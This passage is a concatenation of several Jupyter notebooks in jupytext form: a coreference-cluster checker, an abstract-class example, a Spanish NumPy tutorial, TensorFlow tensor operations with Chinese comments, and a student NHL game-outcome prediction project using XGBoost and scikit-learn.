quiz = quiz_question()
# Start the GUI
gui.mainloop()
# END OF THE QUIZ PROGRAM
|
GUI Quiz Application/Project - GUI Quiz App.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
import json
import jsonlines
import pandas as pd
prediction_output = 'r001.out.predict'
with jsonlines.open(prediction_output) as reader:
for obj in reader:
print(obj['clusters'])
print(obj['sentences'])
print(obj['predicted_clusters'])
len((obj['sentences'][0]))
# ## Gold clusters
# +
trans1 = []
trans2 = []
trans3 = []
clusters = 'clusters'
for i in range(len(obj[clusters])):
#print(obj['clusters'][i])
for j in range(len(obj[clusters][i])):
#print(obj[clusters][i][j])
if obj[clusters][i][j][0] < len(obj['sentences'][0]):
start = obj[clusters][i][j][0]
end = obj[clusters][i][j][1]
trans1 = obj['sentences'][0][start:end+1]
#print(obj['sentences'][0][start:end+1])
if obj[clusters][i][j][0] > len(obj['sentences'][0]):##
start = obj[clusters][i][j][0] - len(obj['sentences'][0])
end = obj[clusters][i][j][1] - len(obj['sentences'][0])
trans1 = obj['sentences'][1][start:end+1]
#print(obj['sentences'][0][start-1:end+1])
trans2.append(trans1)
#print('trans2: ', trans2)
trans1 = []
trans3.append(trans2)
#print('trans3: ', trans3)
trans2 = []
print(trans3)
# -
# ## Predicted clusters
# +
trans1 = []
trans2 = []
trans3 = []
clusters = 'predicted_clusters'
for i in range(len(obj[clusters])):
#print(obj['clusters'][i])
for j in range(len(obj[clusters][i])):
#print(obj[clusters][i][j])
if obj[clusters][i][j][0] < len(obj['sentences'][0]):
start = obj[clusters][i][j][0]
end = obj[clusters][i][j][1]
trans1 = obj['sentences'][0][start:end+1]
#print(obj['sentences'][0][start:end+1])
if obj[clusters][i][j][0] > len(obj['sentences'][0]):##
start = obj[clusters][i][j][0] - len(obj['sentences'][0])
end = obj[clusters][i][j][1] - len(obj['sentences'][0])
trans1 = obj['sentences'][1][start:end+1]
#print(obj['sentences'][0][start-1:end+1])
trans2.append(trans1)
#print('trans2: ', trans2)
trans1 = []
trans3.append(trans2)
#print('trans3: ', trans3)
trans2 = []
print(trans3)
# -
|
check_prediction.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# + pycharm={"name": "#%%\n"}
from abc import ABC, abstractmethod
class Automobile(ABC):
def __init__(self):
print('Automobile created')
@abstractmethod
def start(self):
print('start of automobile called')
class Car(Automobile):
def start(self):
super().start()
print('Start of car called')
c = Car()
c.start()
|
07. OOPS Part-3/01. Abstract classes.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # Numpy, Estadística, Probabilidades
#
# ## Numpy Array
#
# Un array es una estructura de datos que permite agrupar varios valores o elementos en una única variable (un único nombre).
#
# Los elementos de un array son todos del mismo tipo (a diferencia de las listas de Python).
#
# Los arrays de una y dos dimensiones tienen nombres propios:
#
# * un array unidimensional es un **vector**
#
# * un arreglo bidimensional es una **tabla** o **matriz**
#
# Los array de tres dimensiones o más se nombran N-dimensionales.
#
#
# 
#
# ---
# ### Constructor
#
# #### Documentación
# https://docs.scipy.org/doc/numpy/reference/generated/numpy.array.html
#
# La forma más sencilla de construir un array es usando el constructor con un único parámetro:
# `numpy.array(object)`
# donde object es una colección de elementos
#
# Veamos un ejemplo:
# + pycharm={"name": "#%%\n"}
import numpy as np
# + pycharm={"name": "#%%\n"}
# Lista de python
python_list = [1, 4, 2, 5, 3]
# Arreglo (array) de enteros instanciado a partir de una lista:
my_numpy_array = np.array(python_list)
# Imprimo el numpy array creado
print(my_numpy_array)
# -
# ### Métodos para la creación de arrays
#
# #### Documentación
# https://docs.scipy.org/doc/numpy/reference/routines.array-creation.html
#
# Numpy provee métodos para crear e inicializar arrays con determinadas características.
#
# Podemos crear arrays vacíos, de ceros, de unos, con una secuencia, de valores aleatorios, de valores que sigan determinada distribución.
#
# #### Array de valores aleatorios con distribución normal
#
# Ahora veremos cómo instanciar un array de números aleatorios que siga una distribución normal
#
# ##### Documentación
# https://docs.scipy.org/doc/numpy/reference/random/index.html
#
# https://docs.scipy.org/doc/numpy/reference/random/generator.html
#
# https://docs.scipy.org/doc/numpy/reference/random/generated/numpy.random.Generator.normal.html#numpy.random.Generator.normal
#
# El método que genera números aleatorios con distribución normal recibe como parámetros: la media, el desvio standard y las dimensiones del array de salida
#
# `Generator.normal(loc=0.0, scale=1.0, size=None)`
#
# Instanciamos una instancia default de Generator:
# + pycharm={"name": "#%%\n"}
random_generator = np.random.default_rng()
# -
# Generamos ahora 12 números con distribución normal de media 0 y desvío standard 1:
# + pycharm={"name": "#%%\n"}
random_generator.normal(loc = 0, scale = 1, size = 12)
# -
# Ahora generamos una matriz de 16 filas y 4 columnas con números con distribución normal de media 0 y desvío standard 1:
# + pycharm={"name": "#%%\n"}
random_generator.normal(0, 1, size = (16,4))
# -
# Observen que cada vez que ejecutamos esta linea `random_generator.normal(loc = 0, scale = 1, size = 12)` obtenemos valores diferentes para los elementos del array.
#
# Prueben ejecutarla tres o cuatro veces...
#
# Lo mismo ocurre con `random_generator.normal(0, 1, size = (16,4))`
#
# Si queremos obtener el mismo resultado en todas las ejecuciones, debemos inicializar la semilla del generador de números aleatorios.
#
# Para eso hacemos inicializamos la instancia de `Generator` con una semilla cualquiera pero fija:
# + pycharm={"name": "#%%\n"}
seed_cualquier_numero = 2843
random_generator_seed = np.random.default_rng(seed_cualquier_numero)
# -
# Y ahora ejecutemos varias veces las mismas lineas que probamos arriba, usando el objeto random_generator_seed inicializado con una semilla determinada:
# + pycharm={"name": "#%%\n"}
random_generator_seed = np.random.default_rng(seed_cualquier_numero)
random_generator_seed.normal(loc = 0, scale = 1, size = 12)
# + pycharm={"name": "#%%\n"}
random_generator_seed = np.random.default_rng(seed_cualquier_numero)
random_generator_seed.normal(0, 1, size = (16,4))
# -
# <a id="section_atributos"></a>
# ### Atributos
#
# #### Documentación
#
# https://docs.scipy.org/doc/numpy/reference/arrays.ndarray.html#array-attributes
#
# Vamos a ver ahora ejemplos de atributos de un array de tres dimensiones, con numeros aleatorios de distribución uniforme de tamaño 3 * 4 * 5
#
# Generador de números aleatorios con distribución uniforme:
#
# https://docs.scipy.org/doc/numpy/reference/random/generated/numpy.random.Generator.uniform.html#numpy.random.Generator.uniform
# + pycharm={"name": "#%%\n"}
random_generator_seed = np.random.default_rng(seed_cualquier_numero)
low = 10 #incluye el limite inferior
high = 50 # no incluye el límite superior
size = (3, 4, 5)
array_3D = random_generator_seed.uniform(low, high, size)
array_3D
# -
# <a id="section_atributos_ndim"></a>
# #### ndim
#
# Cantidad de dimensiones del array
# + pycharm={"name": "#%%\n"}
array_3D.ndim
# -
# <a id="section_atributos_shape"></a>
# #### shape
#
# Tupla con las dimensiones del array
# + pycharm={"name": "#%%\n"}
array_3D.shape
# + pycharm={"name": "#%%\n"}
type(array_3D.shape)
# -
# > Observación: `len(array_3D.shape) == array_3D.ndim`
# <a id="section_atributos_size"></a>
# #### size
#
# Cantidad de elementos en el array
# + pycharm={"name": "#%%\n"}
array_3D.size
# -
# > Observación: `np.prod(array_3D.shape) == array_3D.size`
# >
# > `np.prod` multiplica todos los elementos en la tupla
# <a id="section_atributos_dtype"></a>
# #### dtype
# [volver a TOC](#section_toc)
#
# Tipo de datos de los elementos que componen el array
# + pycharm={"name": "#%%\n"}
array_3D.dtype
# -
# <a id="section_indexing"></a>
# ### Indexing
#
# Un problema común es seleccionar los elementos de un array de acuerdo a algún criterio.
#
# Llamamos "indexing" a la operación que resuleve el problema de acceder a los elementos de un array con algún criterio.
#
# Existen tres tipos de indexing en Numpy:
#
# * **Array Slicing**: accedemos a los elementos con los parámetros start,stop,step.
# Por ejemplo `my_array[0:5:-1]`
#
# * **Fancy Indexing**: creamos una lista de índices y la usamos para acceder a ciertos elementos del array: `my_array[[3,5,7,8]]`
#
# * **Boolean Indexing**: creamos una "máscara booleana" (un array o lista de True y False) para acceder a ciertos elementos: `my_array[my_array > 4]`
#
#
# <a id="section_indexing_slicing"></a>
# #### Array Slicing
#
# ##### Slicing sobre una dimensión
#
# El slicing es similar al de las listas de python [start:stop:step].
#
# El índice stop no se incluye pero el start sí se incluye.
#
# Por ejemplo [1:3] incluye al índice 1 pero no al 3.
#
# Funciona como un intervalo semicerrado [1,3).
#
# Si necesitan refrescar cómo funciona el slicing en listas pueden ver https://stackoverflow.com/questions/509211/understanding-slice-notation
#
#
# 
#
#
# Veamos algunos ejemplo:
#
# Creamos un array de una dimensión usando el método
# `np.arange` que devuelve valores espaciados uniformemente dentro de un intervalo dado.
#
# https://docs.scipy.org/doc/numpy/reference/generated/numpy.arange.html
# + pycharm={"name": "#%%\n"}
# Sobre un array de una dimension con números enteros entre 0 y 9:
one_d_array = np.arange(10)
one_d_array
# + pycharm={"name": "#%%\n"}
# Start = 1: empezamos por el segundo elemento
# Stop: No está definido, entonces llegamos hasta el final.
# Step: El paso o distancia entre los elementos es 2.
one_d_array[1::2]
# + pycharm={"name": "#%%\n"}
# Start: No está definido, entonces comenzamos desde el primero.
# Stop: No está definido, entonces llegamos hasta el final.
# Step = -1, para invertir el orden del array
one_d_array[::-1]
# + pycharm={"name": "#%%\n"}
# Si queremos hacer slicing en orden invertido
one_d_array[7:2:-1]
# -
# ##### Slicing sobre arrays de más dimensiones
#
# Cuando tenemos más de una dimensión, podemos hacer slicing sobre cada una de ellas separándolas con una coma.
#
# Veamos algunos ejemplos:
# + pycharm={"name": "#%%\n"}
random_generator_seed = np.random.default_rng(seed_cualquier_numero)
low = 0 #incluye el limite inferior
high = 10 # no incluye el límite superior
size = (3, 4)
two_d_array = random_generator_seed.uniform(low, high, size)
two_d_array
# + pycharm={"name": "#%%\n"}
# Los dos puntos ( : ) indican que accedemos a todos los elementos de cada fila
# y el cero después de la coma indica que sólamente lo hacemos para la columna 0 (la primera).
two_d_array[:, 0]
# + pycharm={"name": "#%%\n"}
# Accedemos a la tercer fila
two_d_array[2, :]
# + pycharm={"name": "#%%\n"}
# Otra forma de acceder a la tercer fila
two_d_array[2]
# + pycharm={"name": "#%%\n"}
# Todas la filas, un slice de la segunda y tercer columna (índices 1 y 2)
two_d_array[:, 1:3]
# + pycharm={"name": "#%%\n"}
# todas las filas, todas las columnas listadas en orden inverso
two_d_array[:, ::-1]
# -
#
# <a id="section_indexing_fancy"></a>
# #### Fancy Indexing
# [volver a TOC](#section_toc)
#
# Esta técnica consiste en generar listas que contienen los índices de los elementos que queremos seleccionar y utilizar estas listas para indexar.
#
# Veamos algunos ejemplos:
# + pycharm={"name": "#%%\n"}
# nos quedamos con todas las columnas y las filas 1, 3, 2 y repetimos la 1 (índices 0,2,1,0)
lista_indices_filas = [0, 2, 1, 0]
two_d_array[lista_indices_filas]
# + pycharm={"name": "#%%\n"}
# nos quedamos con todas las filas y las columnas 3, 4, 2, y reptimos la 3 (índices 2,3,1,2)
lista_indices_columnas = [2, 3, 1, 2]
two_d_array[:, lista_indices_columnas]
# + pycharm={"name": "#%%\n"}
# y ahora seleccionamos tanto filas como columnas, combinando los dos casos anteriores
two_d_array[lista_indices_filas, lista_indices_columnas]
# -
# Observemos que al pasar las dos listas, estamos seleccionando los elementos
# (0, 2), (2, 3), (1, 1) y (0,2)
#
# Se cumple que `indice_elem_i = (lista_indices_filas[i], lista_indices_columnas[i])`
# <a id="section_indexing_boolean"></a>
# #### Boolean Indexing
#
# Esta técnica se basa en crear una "máscara booleana", que es una lista de valores True y False que sirve para seleccionar sólo los elementos cuyo índice coincide con un valor True.
#
# Veamos algunos ejemplos sobre two_d_array:
# + pycharm={"name": "#%%\n"}
two_d_array
# -
# Vamos a seleccionar los elementos que sean mayores que 5. Para esos creamos uma máscara con esa condición:
# + pycharm={"name": "#%%\n"}
mask_great_5 = two_d_array > 5
mask_great_5
# -
# La máscara tiene valor True en aquellos elementos de two_d_array con valor mayor a 5, y False en los que tienen valor menor o igual que 5.
#
# Ahora usemos esa máscara para seleccionar los elementos que cumplen esa condición, o sea los que tienen valor True en la máscara:
# + pycharm={"name": "#%%\n"}
two_d_array[mask_great_5]
# -
# Definamos ahora una condición más compleja: vamos a seleccionar los elementos que sean mayores que 5 y menores que 8
# + pycharm={"name": "#%%\n"}
mask_great_5_less_8 = (two_d_array > 5) & (two_d_array < 8)
mask_great_5_less_8
# -
# Ahora usemos esa máscara para seleccionar los elementos que cumplen esa condición, o sea los que tienen valor True en la máscara:
# + pycharm={"name": "#%%\n"}
two_d_array[mask_great_5_less_8]
|
Code/3-numpy/1_numpy.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 2
# language: python
# name: python2
# ---
# +
from __future__ import print_function
from IPython import display
import tensorflow as tf
import numpy as np
from tensorflow.python.data import Dataset
import pandas as pd
try:
tf.contrib.eager.enable_eager_execution()
print("TF imported with eager execution!")
except ValueError:
print("TF already imported with eager execution!")
# -
# # 张量运算相关函数
# 定义常量
a = tf.constant([1, 2, 3], dtype=tf.int32)
print(a)
# tf.Tensor([1 2 3], shape=(3,), dtype=int32)
# 创建指定纬度数据, 以 1 填充
print(tf.ones([6]))
print(tf.ones([3, 2]))
# 创建指定纬度数据, 以 0 填充
print(tf.zeros([6]))
print(tf.zeros([3, 2]))
# 重置数据的维度
a = tf.constant([1, 2, 3, 4, 5, 6, 7, 8, 9])
print(a)
print(tf.reshape(a, [3, 3]))
# 随机数 - 正态分布
print(tf.random_normal(shape=[10], mean=2.0, stddev=1.0))
# 随机数 - 范围随机
print(tf.random_uniform(shape=[5, 5], minval=50, maxval=100))
# 数据拼接成多维
d1 = tf.random_uniform([10, 1], 0, 10)
d2 = tf.random_uniform([10, 1], 0, 10)
d3 = tf.add(d1,d2)
result = tf.concat([d1,d2,d3], axis=1)
print("d1:", d1)
print("d2:", d2)
print("d3:", d3)
print("result:", result)
datas = pd.DataFrame()
s1 = pd.Series([x for x in np.arange(100)])
datas["index"] = s1
print(datas)
a1 = [x for x in np.arange(10)]
print(a1)
a2 = np.random.permutation(a1)
print(a2)
np.random.shuffle(a1)
print(a1)
a1 = [x for x in np.arange(10)]
a1 = np.reshape(a1, [5, 2])
print(a1)
a2 = np.random.permutation(a1)
print(a2)
np.random.shuffle(a1)
print(a1)
print(np.random.permutation(np.arange(10)))
print(np.random.shuffle(np.arange(10)))
a1 = np.random.permutation(np.arange(100))
r1 = zip(range(1, 10), range(2, 11))
print(r1)
for rr in r1:
# rr is tuple
print(type(rr))
print("%d to %d" % rr)
print("r0 = %d, r1 = %d" % (rr[0], rr[1]))
# pd.Series.quantile sample
s1 = pd.Series(np.arange(100))
s1 = s1.append(pd.Series(np.arange(50)))
# print(s1)
r1 = s1.quantile([x for x in np.arange(0.1, 1.1, 0.1)])
print(r1)
print([r1[q] for q in r1.keys()])
|
Notes/TFOperation.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# + [markdown] id="view-in-github" colab_type="text"
# <a href="https://colab.research.google.com/github/npgeorge/NHL_Project/blob/master/NHL_Data_Project_Team_Stats.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>
# + [markdown] id="O1Qb9fmLGeWv" colab_type="text"
# #NHL Data Project
#
# + [markdown] id="RH-SQ-cfj9BI" colab_type="text"
# #Answers
#
# Choose your target. Which column in your tabular dataset will you predict?
#
# I will predict on the "won" column for the Boston Bruins first, and apply that model to all teams.
#
# Is your problem regression or classification?
#
# Regression, win or loss is binary. I could try classification as well.
#
# How is your target distributed?
#
# Regression: Is the target right-skewed? If so, you may want to log transform the target. TBD.
#
#
# Choose which observations you will use to train, validate, and test your model.
#
# - Are some observations outliers? Will you exclude them? TBD
# - Will you do a random split or a time-based split? Random.
#
#
# Choose your evaluation metric(s).
# - Classification: Is your majority class frequency > 50% and < 70% ? If so, you can just use accuracy if you want. Outside that range, accuracy could be misleading. What evaluation metric will you choose, in addition to or instead of accuracy?
# - Begin to clean and explore your data.
# - Begin to choose which features, if any, to exclude. Would some features "leak" future information?
# + id="dkNB583mYbhg" colab_type="code" colab={}
# %%capture
import sys
if 'google.colab' in sys.modules:
# Install packages in Colab
# !pip install category_encoders==2.*
# !pip install eli5
# !pip install pandas-profiling==2.*
# !pip install pdpbox
# !pip install shap
# !pip install plotly_express
#imports
import pandas as pd
import matplotlib.pyplot as plt
import numpy as np
import seaborn as sns
import plotly_express as px
import sklearn
# + id="1aM2n7XVR3fO" colab_type="code" outputId="9bd2fbb5-9ca6-48dc-e981-a534fb4ce02e" colab={"base_uri": "https://localhost:8080/", "height": 125}
from google.colab import drive
drive.mount('/content/gdrive')
# + id="QfwA3lOVSXpJ" colab_type="code" colab={}
file_path = '/content/gdrive/My Drive/Lambda School/NHL Project/game_teams_stats.csv'
# + id="W7w9FrznSe2s" colab_type="code" colab={}
df = pd.read_csv(file_path)
# + id="B2wVEHUGlQCh" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 34} outputId="4f2c3419-ae3b-4321-d445-893fa52bf06d"
df.shape
# + id="amTHVpwU2w72" colab_type="code" outputId="e729f266-b0e8-4333-a594-660b669fe474" colab={"base_uri": "https://localhost:8080/", "height": 97}
df.head(1)
# + id="IpUmmBBmv2C7" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 267} outputId="a6f1d70f-cbaa-4bb4-fc96-ee3a7a9c0d0f"
df.tail()
# + id="iznqI9heeClY" colab_type="code" outputId="b7be254a-131b-44a3-d0b8-866520d9df4f" colab={"base_uri": "https://localhost:8080/", "height": 301}
df.dtypes
# + [markdown] id="JEgLsg6jV84s" colab_type="text"
#
# Game IDs
# The first 4 digits identify the season of the game (ie. 2017 for the 2017-2018 season).
# The next 2 digits give the type of game, where 01 = preseason, 02 = regular season,
# 03 = playoffs, 04 = all-star.
# The final 4 digits identify the specific game number.
# For regular season and preseason games, this ranges from 0001 to the
# number of games played. (1271 for seasons with 31 teams (2017 and onwards)
# and 1230 for seasons with 30 teams).
# For playoff games, the 2nd digit of the specific number gives the round of the playoffs,
# the 3rd digit specifies the matchup, and the 4th digit specifies the game (out of 7).
#
# + id="EQJ9hW6OZYMK" colab_type="code" colab={}
#wrangle function to separate the game_id column into season, game_type, and game_number
def wrangle(X):
#breaking out game_id
X['season'] = X.game_id.astype(str).str[:4].astype(int)
#regular season and playoffs
X['game_type'] = X.game_id.astype(str).str[4:6].astype(int)
#to allow ordering of games
X['game_number'] = X.game_id.astype(str).str[6:].astype(int)
# return the wrangled dataframe
return X
df = wrangle(df)
# + id="G9KFJNlYZdwN" colab_type="code" outputId="bee33641-a3fa-408a-8b45-4534c0d4eb11" colab={"base_uri": "https://localhost:8080/", "height": 526}
#sorting by game_id test
df.sort_values('game_id')
# + id="1ajlyyVGos1z" colab_type="code" outputId="512ab505-c8c1-43cd-80bc-0db047353ae2" colab={"base_uri": "https://localhost:8080/", "height": 176}
#seasons conditional
season_2010to2011 = (df['season'] == 2010)
season_2011to2012 = (df['season'] == 2011)
season_2012to2013 = (df['season'] == 2012)
season_2013to2014 = (df['season'] == 2013)
season_2014to2015 = (df['season'] == 2014)
season_2015to2016 = (df['season'] == 2015)
season_2016to2017 = (df['season'] == 2016)
season_2017to2018 = (df['season'] == 2017)
season_2018to2019 = (df['season'] == 2018)
#passing in each condition
df_10_11 = df[season_2010to2011]
df_11_12 = df[season_2011to2012]
df_12_13 = df[season_2012to2013]
df_13_14 = df[season_2013to2014]
df_14_15 = df[season_2014to2015]
df_15_16 = df[season_2015to2016]
df_16_17 = df[season_2016to2017]
df_17_18 = df[season_2017to2018]
df_18_19 = df[season_2018to2019]
#seasons can vary depending on playoff games
#2012 to 2013 season doesn't make sense... hmmm, a lot less data this year
print('2010-2011 Season games, data collected: ', df_10_11.shape)
print('2011-2012 Season games, data collected: ', df_11_12.shape)
print('2012-2013 Season games, data collected: ', df_12_13.shape)
print('2013-2014 Season games, data collected: ', df_13_14.shape)
print('2014-2015 Season games, data collected: ', df_14_15.shape)
print('2015-2016 Season games, data collected: ', df_15_16.shape)
print('2016-2017 Season games, data collected: ', df_16_17.shape)
print('2017-2018 Season games, data collected: ', df_17_18.shape)
print('2018-2019 Season games, data collected: ', df_18_19.shape)
# + id="srNf4FgQ1vmy" colab_type="code" colab={}
#checking out 2012 data, may just drop it or skip it
#df.loc[(df['game_id'] >= 2012020000) & (df['game_id'] <= 2012031300)]
# + id="QkysjyZ6x1Dx" colab_type="code" colab={}
#checking through 2012 season
#df.loc[df['game_id'] >= 2012020570 & df['game_id'] <= 2012021271]
#reg_season = ((df['game_id'] >= 2012020000) & (df['game_id'] <= 2012021300))
#playoffs = ((df['game_id'] >= 2012030000) & (df['game_id'] <= 2012031300))
#a_range = df[a]['game_id'].max() - df[a]['game_id'].min()
#b_range = df[b]['game_id'].max() - df[b]['game_id'].min()
#print(a_range)
#print(b_range)
# + id="T2UF-9RINr-C" colab_type="code" outputId="6ee94a0f-214c-4959-def0-0c5c2c38088f" colab={"base_uri": "https://localhost:8080/", "height": 34}
#bruins
#if a model works for one team, it *could* work broadly for others
#this may turn out to be a bad assumption
#this filter returns the df for the Bruins
#or statement for home and away games
bruins_id_condition = df['team_id'] == 6
df_bruins = df[bruins_id_condition]
df_bruins.shape
# + id="zVYqec434R55" colab_type="code" outputId="0a5b8772-424a-4e35-f462-c543d2bb1ee6" colab={"base_uri": "https://localhost:8080/", "height": 34}
#bruins 13 to 14 season
bruins_id_condition_13_14 = df_13_14['team_id'] == 6
df_bruins_13_14 = df_13_14[bruins_id_condition_13_14]
df_bruins_13_14.shape
# + id="oxo4IWS4pNYF" colab_type="code" colab={}
#sort the season to be in order of the games played
#want to have a streak feature... wins in a row, losses in a row
#df_bruins_13_14 = df_bruins_13_14.sort_values(by=['game_number'])
# + id="E-lLjS3eOmAE" colab_type="code" colab={}
#different plots for visualizations
#px.scatter(df_bruins_13_14, x='shots', y='goals', marginal_x='box', marginal_y='violin', trendline='ols')
#px.scatter(df_bruins_13_14, x='hits', y='goals', marginal_x='box', marginal_y='violin')
#px.scatter(df_bruins_13_14, x='giveaways', y='goals', marginal_x='box', marginal_y='violin')
# + id="j6KgJEhHObeR" colab_type="code" outputId="ad4fdb8b-e5cd-4640-8229-112ff328f7fa" colab={"base_uri": "https://localhost:8080/", "height": 70}
#baseline, can we beat the Bruins baseline target?
baseline_target = 'won'
y_baseline = df_bruins[baseline_target]
y_baseline.value_counts(normalize=True)
# + id="f7mqqtEs58eZ" colab_type="code" outputId="86872743-c63a-42cb-e475-18da763c51d4" colab={"base_uri": "https://localhost:8080/", "height": 34}
import pandas as pd
from sklearn.model_selection import train_test_split
#train, test
train, test = train_test_split(df_bruins,
train_size=0.80,
test_size=0.20,
stratify=df_bruins['won'],
random_state=42)
train.shape, test.shape
# + id="6eIV3h1d6cKl" colab_type="code" outputId="0b2b17c5-7784-4516-eb40-bf432bbb05de" colab={"base_uri": "https://localhost:8080/", "height": 34}
#train, val
train, val = train_test_split(train,
train_size=0.80,
test_size=0.20,
stratify=train['won'],
random_state=42)
train.shape, val.shape
# + id="IogUVnDdV1pc" colab_type="code" outputId="924fa8f5-5445-434b-db33-7df4d8371be9" colab={"base_uri": "https://localhost:8080/", "height": 217}
train.head()
# + id="8sy-nH176l18" colab_type="code" colab={}
#target and features
target = 'won'
#drop target
train_features = train.drop(columns=[target,'team_id', 'game_id', 'powerPlayGoals', 'game_number', 'settled_in', 'head_coach', 'season'])
#numeric features
num_feat = train_features.select_dtypes(include='number').columns.tolist()
#series with cardinality of non-numeric features
cardinality = train_features.select_dtypes(exclude='number').nunique()
#list with cardinality less than 10
cat_feat = cardinality[cardinality <= 10].index.tolist()
# Combine the lists
features = num_feat + cat_feat
# + id="sjL2g46464iL" colab_type="code" colab={}
# Arrange data into X features matrix and y target vector
X_train = train[features]
y_train = train[target]
X_val = val[features]
y_val = val[target]
X_test = test[features]
y_test = test[target]
# + id="t3yXgMIfVN7f" colab_type="code" outputId="39923d35-76eb-4a2c-ba28-eca1e6d15e2f" colab={"base_uri": "https://localhost:8080/", "height": 34}
X_train.shape
# + id="xrljHjNO-hLi" colab_type="code" outputId="6acbf8e5-a960-4028-e86b-8a4760692a40" colab={"base_uri": "https://localhost:8080/", "height": 70}
#with XG Boost
import category_encoders as ce
import xgboost
from xgboost import XGBClassifier
import sklearn
from sklearn.pipeline import make_pipeline
from sklearn.metrics import accuracy_score
import joblib
from joblib import dump
pipeline_xgb = make_pipeline(
ce.OrdinalEncoder(),
XGBClassifier(n_estimators=15, random_state=42, n_jobs=-1)
)
# Fit on train, score on val
pipeline_xgb.fit(X_train, y_train)
print('Training Accuracy', pipeline_xgb.score(X_train, y_train))
print('Validation Accuracy:', pipeline_xgb.score(X_val, y_val))
#predict on test
y_pred_xgb = pipeline_xgb.predict(X_test)
#Test Accuracy score
print('Test Accuracy for XG Boost', accuracy_score(y_test, y_pred_xgb))
# + id="renVCV3egDx5" colab_type="code" outputId="64b0b9e8-a07d-4a28-c922-78165e2a6cbc" colab={"base_uri": "https://localhost:8080/", "height": 87}
#printing versions to download locally
print(f'joblib=={joblib.__version__}')
print(f'category_encoders=={ce.__version__}')
print(f'scikit-learn=={sklearn.__version__}')
print(f'xgboost=={xgboost.__version__}')
# + id="95bR3vgm-6Df" colab_type="code" outputId="a4fa39e3-f553-4f86-b1d6-55b020a0bf6e" colab={"base_uri": "https://localhost:8080/", "height": 374}
#feature importance for X val
import matplotlib.pyplot as plt
model = pipeline_xgb.named_steps['xgbclassifier']
encoder = pipeline_xgb.named_steps['ordinalencoder']
encoded_columns = encoder.transform(X_val).columns
importances = pd.Series(model.feature_importances_, encoded_columns)
plt.figure(figsize=(3,6))
importances.sort_values().plot.barh(color='black');
# + id="yfdmHzBz0LXY" colab_type="code" outputId="7e135dce-a8da-4a52-f5c5-7925e267ea02" colab={"base_uri": "https://localhost:8080/", "height": 70}
#random forest classifier pipeline
import category_encoders as ce
from sklearn.impute import SimpleImputer
from sklearn.ensemble import RandomForestClassifier
from sklearn.pipeline import make_pipeline
from sklearn.preprocessing import StandardScaler
from sklearn.metrics import accuracy_score
pipeline = make_pipeline(
ce.OneHotEncoder(use_cat_names=True),
SimpleImputer(),
StandardScaler(),
RandomForestClassifier(n_estimators=100,
n_jobs=-1,
min_samples_leaf=1,
max_depth=10,
class_weight='balanced',
max_features=7,
)
)
# Fit on train
pipeline.fit(X_train, y_train)
# Predict on Test Data
y_pred_rfc = pipeline.predict(X_test)
# Score on Train/Val
print('Training Accuracy', pipeline.score(X_train, y_train))
print('Validation Accuracy', pipeline.score(X_val, y_val))
print('Test Accuracy for Random Forest', accuracy_score(y_test, y_pred_rfc))
# + id="mcvsiLY71_4x" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 70} outputId="a7b026d0-cb86-4653-852e-31269b12c150"
#Linear model that beats baseline
#logistic regression
from sklearn.linear_model import LogisticRegression
pipeline_lin = make_pipeline(
ce.OneHotEncoder(use_cat_names=True),
SimpleImputer(),
StandardScaler(),
#Ridge(alpha=1.0)
LogisticRegression(solver='lbfgs')
)
# Fit on train
pipeline_lin.fit(X_train, y_train)
#score on train
pipeline_lin.score(X_train, y_train)
# Predict on Test Data
y_pred_lin = pipeline_lin.predict(X_test)
# Score on Train/Val
print('Training Accuracy', pipeline_lin.score(X_train, y_train))
print('Validation Accuracy', pipeline_lin.score(X_val, y_val))
print('Test Accuracy', pipeline_lin.score(X_test, y_test))
# + id="zb_ZYET40fET" colab_type="code" outputId="4559e14c-710a-4878-bc1e-82fcad17259f" colab={"base_uri": "https://localhost:8080/", "height": 141}
#setting up ELI5 for XGBOOST
pipeline_pi = make_pipeline(
ce.OrdinalEncoder(),
SimpleImputer(strategy='median')
)
X_train_transformed = pipeline_pi.fit_transform(X_train)
X_val_transformed = pipeline_pi.transform(X_val)
model_pi = XGBClassifier(n_estimators=15, random_state=42, n_jobs=-1)
model_pi.fit(X_train_transformed, y_train)
# + id="EIGxVuCj1B_J" colab_type="code" outputId="65b9bbac-c631-4272-8f11-dc37262b70f8" colab={"base_uri": "https://localhost:8080/", "height": 545}
import eli5
from eli5.sklearn import PermutationImportance
permuter = PermutationImportance(
model_pi,
scoring='accuracy',
n_iter=5,
random_state=42
)
permuter.fit(X_val_transformed, y_val)
# + id="DTgjjsI51V3D" colab_type="code" outputId="b03b4d41-d5fe-40b2-8354-89e25d569846" colab={"base_uri": "https://localhost:8080/", "height": 52}
permuter.feature_importances_
# + id="jf0vO_yW1Zut" colab_type="code" outputId="f4e15c43-7148-4e60-948a-eb47b1cae24d" colab={"base_uri": "https://localhost:8080/", "height": 200}
eli5.show_weights(
permuter,
top=None,
feature_names=X_val.columns.tolist()
)
# + id="M--QNzKBTcjE" colab_type="code" colab={}
import matplotlib.pyplot as plt
plt.rcParams['figure.dpi'] = 72
# + id="_fIvsP7yT6VF" colab_type="code" colab={}
from pdpbox.pdp import pdp_isolate, pdp_plot
# + id="ktTd76zUUBfI" colab_type="code" outputId="8ba7cd34-a189-4c9f-f5ef-28fe463d6425" colab={"base_uri": "https://localhost:8080/", "height": 648}
feature='faceOffWinPercentage'
pdp_faceoffs = pdp_isolate(
model = pipeline_xgb,
